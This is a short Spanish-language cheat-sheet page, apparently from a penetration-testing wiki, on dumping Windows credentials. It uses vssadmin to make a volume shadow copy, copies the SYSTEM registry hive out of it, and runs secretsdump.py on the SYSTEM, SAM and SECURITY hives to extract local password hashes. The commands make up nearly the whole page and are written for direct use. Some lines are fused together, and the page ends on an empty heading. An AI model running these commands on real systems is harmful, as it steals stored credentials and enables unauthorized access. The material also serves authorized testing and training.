Dumpeo de SYSTEM
Windows Privilege Escalation
Copiando SYSTEM usando VSS (requiere administrador)
vssadmin create shadow /for=C:Con exito se creó la copia de sombra: '{GUID-1234-...}'copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.vss# Con todos los archivos necesarios
secretsdump.py -system SYSTEM.vss -sam SAM.vss -security SECURITY.vss LOCAL
# Solo con SYSTEM y SAM
secretsdump.py -system SYSTEM.vss -sam SAM.vss LOCALTecnicas contra SYSTEM (con bajo privilegio)
Last updated